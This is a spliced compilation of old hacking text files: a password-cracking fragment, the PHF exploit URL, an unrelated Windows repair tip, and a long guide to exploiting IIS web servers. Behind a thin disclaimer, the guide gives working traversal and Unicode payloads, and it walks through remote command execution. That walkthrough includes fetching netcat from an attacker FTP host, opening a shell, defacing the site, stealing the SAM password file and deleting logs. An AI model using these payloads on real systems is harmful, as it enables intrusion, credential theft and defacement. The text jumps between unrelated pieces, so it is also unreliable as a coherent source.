numeric letters may also be added) . We will be releasing our pasword file
to the public soon, it will be called, Psychotic Candy, "The Perfect Drug."
As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives
you.


The PHF Technique

Well I wasn't sure if I should include this section due to the fact that
everybody already knows it and most servers have already found out about
the bug and fixed it. But since I have been asked questions about the phf
I decided to include it.

The phf technique is by far the easiest way of getting a password file
(although it doesn't work 95% of the time). But to do the phf all you do
is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to
get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works).

HAL.DLL Missing or Corrupt

If you get an error regarding a missing or corrupt hal.dll file, it might simply be the BOOT.INI file on the root of the C: drive that is misconfigured

1.Insert and boot from your WindowsXP CD.
2.At the first R=Repair option, press the R key
3.Press the number that corresponds to the correct location for the installation of Windows you want to repair.
Typically this will be #1
4.Type bootcfg /list to show the current entries in the BOOT.INI file
5.Type bootcfg /rebuild to repair it
6.Take out the CD ROM and type exit

Guide to IIS Exploitation

Disclaimer: I do not condone hacking IIS servers in any way,

shape or form. This guide is intended as a guide

for admins to help them understand what most

script kiddies don't understand but are happy to

exploit.







--[On the first day, God created directory traversal]



Relative paths are the developers friend. They allow an entire website to

be moved to another directory without the need for changing all the links

in the html. For example, lets say we have a webpage called 'pictures.html'

in the htdocs dir:



Absolute path: /home/webpages/htdocs/pictures.html

Absolute path: /home/webpages/images/pic1.gif



In the html you can refer to the 'pic1.gif' via an absolute path shown

above or use a relative path:



Relative path: ../images/pic1.gif



The relative path tells the server that it has to go to the parent

directory (dot dot) --> from /home/webpages/htdocs to /home/webpages. Then

the server goes into the images dir and looks for the gif file to display.



Anyone who has used the 'cd' command in DOS and *nix should be familiar

with the operation. So what's the problem I hear you ask... well, the

programmers of web server didn't think to check the supplied URL to ensure

that the requested file was actually in the web directory. This allows

someone to backtrack through the servers directory structure and request

files that the web server has access to. For example,



http://www.target.com/../../../etc/passwd



NB. you can also use double dots and double quotes. This is useful to evade

Intrusion Detection Systems (IDS):



http://www.target.com//....//....//...././etc/./passwd



The webserver simply strips the extra stuff out and processes the request.

This is the same as the previous example and can make string matching IDS's

work for their money.





--[On the second day, God created Hexadecimal]



Once programmers started to realise the mistake they began to create parser

routines to check for naughty URL's and keep the requests within the

document root. Then along comes a wiley hacker who wonders if by encoding

the URL will it still be recognised by the parser routines.



You may have noticed that when you enter a URL that includes a space it is

replaced with the hex equivalent (%20):



http://www.target.com/stuff/my index.html



becomes



http://www.target.com/stuff/my%20index.html



and voila, it works. So what would happen if we changed the now denied URL:



http://www.target.com/../../../etc/passwd



to



http://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd



The parser routine checks for the existence of dots in the path and finds

none... the webserver then proceeds with the request.



An interesting feature is that you can encode the hex symbol and the web

server will decode it all for you. This is called the "double decode".

For example, given the URL "http://victim.com/..%252f..%252fdocs/", the

following will take place:



(1) On the first decode, the string will be converted to:



"http://victim.com/..%2f..%2fdocs/"



[%25 = '%' so '%252f' is decoded to '%2f']



(2) On the second decode, the string will be converted to:



"http://victim.com/../../docs/"



[%2f = '/']





--[On the third day, God created Unicode]



The World Wide Web is a global phenomenon and as such needs to be globally

interoperable. This raised the question of how to deal with all the different

character sets around the world. As a response to this, Unicode was created:



-----------------------------------------------------------------

Unicode provides a unique number for every character, no matter

what the platform, no matter what the program, no matter what

the language. The Unicode Standard has been adopted by such

industry leaders as Apple, HP, IBM, JustSystem, Microsoft,

Oracle,SAP, Sun, Sybase, Unisys and many others. Unicode is

required by modern standards such as XML, Java, ECMAScript

(JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official

way to implement ISO/IEC 10646. It is supported in many operating

systems, all modern browsers, and many other products.

-----from http://www.unicode.org---------------------------------





The problem with Unicode is that it requires 16 bits for a single character

and software tended to use 8 bits for a single character. Unicode TransForm

using 8 bits (UTF-8) was created. This allows for multibyte encoding where a

variable number of bytes can be used for each character:



Character 1-byte 2-byte 3-byte

. 2E C0 AE E0 80 AE

/ 2F C0 AF E0 80 AF

\ 5C C1 9C E0 81 9C



This lead to a new vulnerability in certain webservers. The parser didn't

understand this new encoding and allowed it through :-)



For example:



www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd



Recent vulnerabilities have been taking advantage of the fact that the web

server doesn't understand the Unicode UTF-8 character set but the underlying

OS does:



www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dir



Understanding the distinction between Unicode and UTF-8 can be difficult. As

a general rule of thumb you can use the following format as a guide:



%uxxxx = Unicode

%xx%xx = UTF-8

%xx = Hexidecimal

%xxxx = Double Decode



--[On the fourth day, God created default installs]



IIS comes installed with various DLL's (Dynamic Link Libraries) that

increase the functionality of the web server. These ISAPI (Internet Server

API) applications allow programmers/developers to deliver more functionality

to IIS.



The DLL's are loaded into memory at startup and offer significant speed

over traditional CGI programs. For example, they can be combined with the

Internet Database Connector (httpodbc.dll) to create interactive sites that

use ODBC to access databases.



The problem is that some of these DLL's are insecure and are often installed

with sample scripts that demonstrate how to exploit, erm, I mean use them.



ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active

Server Pages) are basically HTML pages with embedded code that is processed

by the webserver before serving it to the client.



Here's some examples to illustrate how the sample pages installed by default

can aid someone breaking into your site via the ASP.DLL:

[prefix all the examples with http://www.target.com]



/default.asp.



** Appending a '.' to the URL can reveal the source

** on older systems. Remember hex encoding? You can

** also try using %2e to do the same thing.



/msadc/samples/adctest.asp



** This gives you an interface into the msadcs.dll

** and allows creation of DSN's. Read RFP's stuff

** for idea's on how to exploit this.



/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini

/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini



** You can view the source of anything in the

** document root. '/msadc/' needs to be in the

** request as it is checked for, wait for this,

** security :-)



/index.asp::$DATA



** Appending '::$DATA' to the URL can reveal

** the source of the ASP.



/index.asp%81



** Append a hex value between 0x81 and 0xfe

** and you can reveal the source of any server

** processed file. This only works on servers

** that are Chinese, Japanese or Korean.



/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|



** This one allows you to execute remote

** shell commands ;-)



ISM.DLL is used to process requests that end in ".htr". These pages were used

to administer IIS3 servers. In IIS4 they are not used but various .htr samples

are installed by default anyway and offer another avenue for entry.



/index.asp%20%20%20..(220 more)..%20%20.htr



** IIS will redirect this request to ISM.DLL,

** which will strip the '.htr' extension and

** deliver the source code of the file.



/global.asa+.htr



** Does the same thing as the %20%20 exploit

** above. ISM.DLL strips the +.htr and delivers

** you the source of the file



/scripts/iisadmin/ism.dll?http/dir



** Excellent brute force opportunity if the

** dll exists. Successful logons will reveal

** lots of useful stuff.



/iisadmpwd/aexp.htr



** The iisadmpwd diectory contains several .htr

** files that allow NetBIOS resolution and

** password attacks.



/scripts/iisadmin/bdir.htr??c:\inetpub\www



** This method will only reveal directories

** but can be useful for identifying the

** servers structure for more advanced

** attacks later.



MSADCS.DLL is used to allow access to ODBC components via IIS using RDS

(Remote Data Service). RDS is part of the default install of Microsoft Data

Access Components (MDAC) and is a commonly exploited on IIS. It can allow

arbitrary shell commands to be executed with system privileges.



/msadc/msadcs.dll



** If this file exists then there's a pretty

** good chance that you can run the RDS

** exploit again the box. More on this later.



HTTPODBC.DLL is the Internet Connector Database (IDC) and used when the web

server wants to connect to a database. It allows the creation of web pages

from data in the database, and it allows you to update/delete items from

within webpages. Pages with the extension '.idc' are sent to the HTTPODBC.DLL

for processing.



/index.idc::$DATA



** Appending '::$DATA' to the URL can reveal

** the source of the IDC.



/anything.idc



** Requesting a non-existance file will

** reveal the location of the web root.



/scripts/iisadmin/tools/ctss.idc



** Creates a table based on the parameters it

** receives. Excellent place to look at for

** SQL injection.



SSINC.DLL is used for processing Server Side Includes (SSI). '.stm',

'.shtm' and '.shtml' extension are sent to the DLL which interprets

the SSI statements within the HTML before sending it to the client.



An example of SSI would be:







This SSI tells the server to include the 'news.txt' in the final HTML

sent to the use. SSI statements are beyond the scope of this document

but offer another security hole open to our wiley hax0r. Ensure you

remove the app mapping and disable SSI if you do not require its

functionality.



SSINC.DLL is also vulnerable to a remote buffer overflow, read the

following advisory for details:



http://www.nsfocus.com/english/homepage/sa01-06.htm



Some examples of SSINC.DLL fun:



/anything.stm



** If you request a file that doesn't exist

** then the server error message contains the

** the location of the web root.



/somedir/anything.stm/somedir/index.asp



** Using this method allows you to view the

** the source code for index.asp.



IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq'

requests. This DLL has had some big exposure with the recent Nimda worm.

I'm not going into too much detail but '.ida' was used in a buffer

overflow that resulted in user defined code being executed on the server.



/anything.ida or /anything.idq



** Requesting a non-existance file will

** reveal the location of the web root.



/query.idq?CiTemplate=../../../boot.ini



** You can use this to read any file on

** the same drive as the web root



CPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your

IIS server, via a web browser or the Web Publishing Wizard. The existance of

this DLL can allow attackers upload files to the server. Other files such as

uploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with Site

Server and allow upload of documents to the server:



/scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp



** If this file is there then you may be able

** to upload files to the server.



/scripts/uploadn.asp



** Connecting to this page gives you a nice

** gui for uploading your own webpages. You

** probably need to brute the userid.



There are lots more example scripts in the default install and quite a few

of them are very, very insecure. Microsoft recommends that you remove ALL

samples from any production server including the ExAir, WSH, ADO and other

installed samples.



IIS Default Web Site

--------------------

IISSAMPLES - c:\inetpub\iissamples

IISADMIN - c:\winnt\system32\inetsrv\issadmin

IISHELP - c:\winnt\help

SCRIPTS - c:\inetpub\scripts

IISADMPWD - c:\winnt\systems32\inetsrv\iisadmpwd

msadc - c:\program files\common files\system\msadc

logfiles - c:\winnt\system32\logfiles

default.htm - c:\inetpub\wwwroot



IIS Default App Mapping

-----------------------

.asa - c:\winnt\system32\inetsrv\asp.dll

.asp - c:\winnt\system32\inetsrv\asp.dll

.cdx - c:\winnt\system32\inetsrv\asp.dll

.cer - c:\winnt\system32\inetsrv\asp.dll

.htr - c:\winnt\system32\inetsrv\ism.dll

.idc - c:\winnt\system32\inetsrv\httpodbc.dll

.shtm - c:\winnt\system32\inetsrv\ssinc.dll

.shtml - c:\winnt\system32\inetsrv\ssinc.dll

.stm - c:\winnt\system32\inetsrv\ssinc.dll





--[On the fifth day, God created Frontpage Extensions]



Microsoft Frontpage (Originally developed by Vermeer Tech Inc, if you've

ever wondered why they use _vti_) is a web design tool that helps you

create and maintain a web site and allows you to publish it to the web

server.



In order to publish using Frontpage the server needs to run certain

programs, collectively called the Frontpage Server Extensions.



Sounds good I hear you say, but there are many, many security holes in

Frontpage. You can list all the files, download password files and upload

your own files on Frontpage enabled sites.



When you publish a file, Frontpage attempts to read the following URL to

get all the information it needs to publish:



http://www.myserver.com/_vti_inf.html



Then Frontpage uses the following URL to POST the files to the site:



http://www.myserver.com/_vti_bin/shtml.exe/_vti_rpc



It will come as no surprise that this file is not protected and open to

abuse.



All information for the site is stored in the /_vti_pvt/ dir, and its world

readable. Here's some of the things you can look for:



http://www.myserver.com/_vti_pvt/administrators.pwd

http://www.myserver.com/_vti_pvt/authors.pwd

http://www.myserver.com/_vti_pvt/service.pwd

http://www.myserver.com/_vti_pvt/shtml.dll

http://www.myserver.com/_vti_pvt/shtml.exe

http://www.myserver.com/_vti_pvt/users.pwd

http://www.myserver.com/_private





--[On the sixth day, God created CGI]--



The Common Gateway Interface (CGI) is a standard for interfacing external

applications to the web server. A CGI program is excuted in real time and

is used to create dynamic web sites.



Generally, the CGI programs are kept in '/cgi-bin/' but can be placed

anywhere. The programs can be written most languages but typically they are

written in C, Perl or shell scripts.



Many sites will use freely available, downloadable scripts from places like

Matt's Trojan, erm, I mean Matt's Script Archive. Its always a good idea to

look through the source of the scripts for bad system calls and lax input

validation.



CGI deserves a tutorial all to itself and I strongly suggest that you read

the following tutorials... they explain it better than I ever could:



Hacking CGI - http://shells.cyberarmy.com/~johnr/docs/cgi/cgi.txt

Perl CGI Problems - http://www.phrack.com/phrack/55/P55-07



Just to get you in the mood we will have a brief look at CGI exploitation.

There are three main types of CGI hacking; URL encoding attacks, input

validation exploits and buffer overflows.



The first thing to keep in mind is that you are already able to exploit cgi

using the techniques from previous sections. First, we need to cover some

background. CGI can take lots of shapes and forms. One popular use is via

web based forms that submit information to a CGI via a GET or POST.

When the user clicks on the submit button his information is passed to the

CGI script to process either via the URL (GET) or via HTTP headers (POST).

Lets assume that the CGI we are going to exploit asks the user for the name

of a file to display. The 'GET' method uses the URL to pass the information

and it would look like this:



http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd



Lets break that down:



? - separates the request from the parameters

filename - this is the name of the textbox in the html

= - assignment for the parameter/value pair

/etc/passwd - this is what the user typed into the box



You can have multiple fields within a HTML form and these will also be

passed to the CGI. They are separated using a '&':



http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd&user=fugjostle



If you were thinking how could you alter the user supplied input to break

the CGI then good, you're starting to think in terms of security. Lots of

developers love to program new and interesting things but they do not

consider security. A security conscious programmer would write input

validation routines that would process the data and ensure the user wasn't

be malicious or curious.



As you read through some of the free scripts on the web you will start to

realise that many programmers do not think about security. Lets look briefly

at some ways we could exploit the CGI. The first thing to keep in mind is

that you already know the generic exploits from the previous section. The

only area in which we are lacking is programming language specific info.



We will stick with the example cgi that open's a file (and let's assume

its written Perl). Lets look at some of the things we can try:



my_cgi.pl?filename=../../../../../etc/passwd



and lets do the same thing but encode the URL to bypass security checks:



my_cgi.pl?filename=../..%c0%af../..%c0%af../etc/passwd



If you have read the RFP document above then you will be familiar with

poison null bytes. Stop now and go read it... can't be arsed? ok then,

here's the quick version. %00 is valid in a string with Perl but is NUL

in C. So? When Perl wants to open the file it makes a request to the

operating system through a system call. The operating system is written in

C and %00 is a string delimiter. Lets apply this technique to the

following situation.



I decide to secure my CGI. I append '.html' to any request. This means that

the user can only view html files and if they try something else then it

doesn't exist. wh00p @ me :-)



But... what if I was to do the following:



my_cgi.pl?filename=../../../../etc/passwd%00



In Perl the filename string would look like this:



"../../../../etc/passwd\0.html"



Perfectly valid under Perl. I have done my job... or have I? When this is

passed to the OS (which is written in C not Perl) the request looks like

this:



"../../../../etc/passwd"



The OS identifies %00 as the string delimiter and ignores anything that

Comes after it. The webserver then displays the /etc/passwd file... bugger :-(



Many people download scripts from the web and look for problems in the

script. Then the wiley hax0r will go to altavista and search for sites

that are using that script, eg:



url:pollit.cgi



and good old altavista provides a list of sites that are just ripe for the

taking.



The final method of exploiting CGI is via buffer overflows. Languages like

Java and Perl are immune to buffer overflows because the language looks

after memory management. Programs written in a language such as C are

vulnerable because the programmer is supposed to manage the memory. Some

programmers fail to check the size of data it is fitting into the memory

buffer and overwrites data in the stack.



The goal of the buffer overflow is to overwrite the instruction pointer

which points to the location of the next bit of code to run. An attacker

will attempt to overwrite this pointer with a new pointer that points to

attacker's code, usually a root shell.



Quite a few CGI's exist that are vulnerable to this type of attack. For

Example, counter.exe is one such CGI. By writing 2000 A's to the CGI cause

a Denial of Service (DoS).



The details of buffer overflows are beyond the scope of this document.

Look out for a future release ;-)



If you want to dig deeper in buffer overflows then have a look at:



http://www.phrack.com/phrack/49/P49-14





--[On the seventh day, God chilled and haxored the planet]



Well.. I guess its time we actually tried some of the things discussed but

I'm not going to cover everything. I suggest going to the following URL's

and searching for IIS:



http://www.securityfocus.com/

http://www.packetstormsecurity.com/



My main reason for doing this file was to better understand Unicode exploits

and so that is going to be the focus of the exploitation. The first exploit

I'm going to go through is the recent Unicode exploit for IIS4/5:



http://www.securityfocus.com/bid/1806



Before I get emails saying 'hold on, you said that %xx%xx is UTF-8" let me

explain. This had wide exposure on Bugtraq as the Unicode exploit. In

reality, this is not a Unicode sploit but a UTF-8 sploit. I'm going to keep

calling this the Unicode exploit because its now referenced by this name in

the Bugtraq archives and you'll have to search using Unicode to do further

research.



Ok, rant over... To check if the server is exploitable, request the

following URL:



http://target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\



You should get a directory listing of the C:\ drive on the target server.

The important thing to note is that the Unicode string can vary depending

where in the world you are. Some possible alternatives include:



%c1%1c %c0%9v %c0%af %c0%qf %c1%8s %c1%9c %c1%pc



There are many more to choose from, just look at some of the Bugtraq posts or

research UTF-8 for more alternatives.



OK, you can read the directory... what next? You have the directory listing

and the ability to run commands, so you need to find the web root. By default,

the web root is at:



c:\inetpub\wwwroot\



If its not there then go and look for it. Let's write a text file there and

see if we can see it:



cmd.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt



hmmm.. it seems that we don't have write access. Ok, no problem we can get

around that by creating a copy of the cmd.exe that has write privileges:



cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\fug.exe



Let's check if it worked:



http://target.com/scripts/..%c0%af../winnt/system32/fug.exe?/c+dir+c:\



Yep.. all's good so far. Lets try and write to the web root:



fug.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt



Let's open up it up in the browser and see if we can see it:



http://target.com/test.txt



w00t!!! Write access!!! Right, we now have some options open to us. In the

words of Microsoft, where do you want to go today? Working via the URL is

pretty clunky and I like the comfort of a nice command prompt, So lets do

that. I want to bring over a copy of netcat and a nice html page that I'll

use to replace the existing one.



First I need to think about the script I want to run that will get the

files I need from my FTP server:



fugscript:

open ftp.evilhaxor.com

anonymous

anon@microsoft.com

cd pub

get nc.exe

get hacked.html

quit



Right. I need to get this script onto the webserver:



fug.exe?/c+echo%20open%20ftp.evilhaxor.com>fugscript

fug.exe?/c+echo%20anonymous>>fugscript

fug.exe?/c+echo%20anon@microsoft.com>>fugscript

fug.exe?/c+echo%20cd%20pub>>fugscript

fug.exe?/c+echo%20get%20nc.exe>>fugscript

fug.exe?/c+echo%20get%20hacked.html>>fugscript

fug.exe?/c+echo%20quit>>fugscript



OK.. now we have created a script on the server called fugscript. Next step

is to execute the script and get my files from my web server.



fug.exe?/c+ftp%20-s:fugscript



If all goes well the server should begin the FTP transfer and get your files

transferred. Be patient and give it time to transfer. Now you are ready to

get netcat listening on a port. The command line for starting netcat is:



nc.exe -l -p 6667 -e cmd.exe



This tells netcat to listen (-l) on port 6667 (-p) and to spawn cmd.exe (-e)

when someone connects. The last step is to translate this command into URL

speak ;-):



fug.exe?/c+nc.exe%20-l%20-p%206667%20-e%20cmd.exe



Fire up a telnet session and connect to port 6667 on the target system and

voila... you have a cmd prompt. I really hate web defacements... so if your

going to do it then rename the existing index.htm (or default.htm) to

something like index.htm.old (give the poor admin a break, cause you can bet

your arse that he hasn't made a backup). ALSO: you are now using a system

without authorisation and as such, you are guilty under the Computer Misuse

Act in the UK and probably of something similar in your own country. If it

never occurred to you to delete the contents of c:\winnt\system32\logfiles

or the 'fugscript' file then you really shouldn't be doing this.







It just wouldn't be right to talk about IIS exploitation without mentioning

msadc.pl. rfp's perl script is a perfect example of exploit chaining. A

single exploit is not used but a chain of exploits to get the script to

work.



The exploit utilises a combination of inadequate application input validation

and default install fun. The process tries to connect to a Data Source Name

(DSN) to execute commands.



rfp's script tests for the existence /msadc/msadc.dll using the GET method.

This test will be logged and you should edit the script to make it a HEAD

request and add some URL obfuscation madness.



The default msadc.pl script uses "!ADM!ROX!YOUR!WORLD!" as the MIME

separator string. It is advised to change this string as some IDS's are

configured to identify this string.



If you want to write your own scanners then you should be looking for

headers with the content type:



application/x-varg



and of course the IIS version :-) I don't want to go into too much detail

because this is heavily documented on rfp's site:



http://www.wiretrip.net/rfp/



How do I use it? I hear you cry... well, its child's play:



./msadc2.pl -h www.target.com



If all goes well then you should be presented with the following:



command:



Its interesting to note at this point that 'cmd /c' will is run as with the

previous exploit. You can edit the script to run any other executable such

as 'rdsik /s' instead.



This is good, you can know enter the command you want to run on the server.

The previous Unicode exploit should have given you some ideas but here's a

couple that come to mind:



Example 1:

copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\fug.hak



(grabbing fug.hak via your browser should give you a nice file to fire up

in L0phtcrack or JTR)



Example 2:

echo open ftp.evilhaxor.com>fugscript && echo fug>>fugscript

&& echo mypassword>>fugscript... etc. etc.



Anyway, that's about all for now. When I can be bothered I'll add some more

methods to this file. Until then, ensure your box is fully patched and the

default scripts are removed. Go have a look at the following URL and get

secure:



http://www.microsoft.com/security/